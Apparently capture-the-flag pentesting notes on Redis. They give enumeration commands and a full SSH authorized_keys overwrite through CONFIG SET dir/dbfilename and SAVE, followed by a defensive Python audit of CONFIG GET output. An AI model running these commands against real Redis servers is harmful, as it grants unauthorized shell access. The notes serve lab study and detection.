See HTB Postman.
https://book.hacktricks.xyz/pentesting/6379-pentesting-redis
Default port: 6379
Automatic Enumeration:
nmap --script redis-info -sV -p 6379 <IP>
Manual Enumeration:
Connect with nc or redis-cli:
nc -vn 10.10.10.10 6379
redis-cli -h 10.10.10.10 # sudo apt-get install redis-tools
Dump information about the Redis instance. If -NOAUTH is returned, authentication is required.
INFO
Authenticate with the AUTH command. Valid credentials are answered with +OK.
AUTH <username> <password>
Dump configuration settings:
CONFIG GET *
SSH Key Overwrite:
https://book.hacktricks.xyz/pentesting/6379-pentesting-redis#ssh
Generate an SSH public-private key pair on your machine:
ssh-keygen -t rsa
Write the public key to a file:
(echo -e "\n\n"; cat ./.ssh/id_rsa.pub; echo -e "\n\n") > foo.txt
Import the file into Redis:
cat foo.txt | redis-cli -h 10.85.0.52 -x set crackit
Save the public key to the authorized_keys file on the Redis server:
redis-cli -h 10.85.0.52
config set dir /home/test/.ssh/
config set dbfilename "authorized_keys"
save
SSH into the Redis server with the private key:
ssh -i id_rsa <user>@<host>
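Added defender-side example (not from these notes or HackTricks): a Python audit of `CONFIG GET *` output that flags the settings the key-overwrite above depends on (no requirepass, protected-mode off, bound to all interfaces) and the trace it leaves (dir/dbfilename pointed at an SSH path). The sample dump is constructed.

```python
"""Audit redis-cli `CONFIG GET *` output for the weaknesses behind the
authorized_keys overwrite, and for signs that it has already happened."""
import re

# Constructed sample in redis-cli's alternating key/value line format
# (values are illustrative, captured nowhere real).
SAMPLE_CONFIG_OUTPUT = """\
dir
/home/test/.ssh/
dbfilename
authorized_keys
requirepass

protected-mode
no
bind
0.0.0.0
"""

def parse_config_get(text):
    """Turn redis-cli's alternating key/value lines into a dict (empty values kept)."""
    lines = text.split("\n")
    if lines and lines[-1] == "":
        lines.pop()  # trailing newline, not an empty value
    if len(lines) % 2:
        raise ValueError("odd number of lines; not a CONFIG GET dump")
    return dict(zip(lines[0::2], lines[1::2]))

def audit(cfg):
    """Return a list of findings; an empty list means nothing flagged."""
    findings = []
    if not cfg.get("requirepass"):
        findings.append("no requirepass: any client reaching the port has full control")
    if cfg.get("protected-mode", "yes").lower() != "yes":
        findings.append("protected-mode disabled: passwordless access not limited to loopback")
    bind = cfg.get("bind", "")
    # Redis prefixes optional addresses with '-'; strip it before comparing.
    addrs = [a.lstrip("-") for a in bind.split()]
    if not addrs or any(a in ("0.0.0.0", "*", "::") for a in addrs):
        findings.append(f"bound to all interfaces (bind={bind or 'unset'!r})")
    dir_, dbfile = cfg.get("dir", ""), cfg.get("dbfilename", "")
    if re.search(r"(^|/)\.ssh/?$", dir_) or dbfile == "authorized_keys":
        findings.append(f"RDB target is an SSH path: dir={dir_!r} dbfilename={dbfile!r}")
    elif not dbfile.endswith(".rdb"):
        findings.append(f"dbfilename {dbfile!r} is not an .rdb file: check for SAVE abuse")
    return findings

if __name__ == "__main__":
    for finding in audit(parse_config_get(SAMPLE_CONFIG_OUTPUT)):
        print("FLAG:", finding)
```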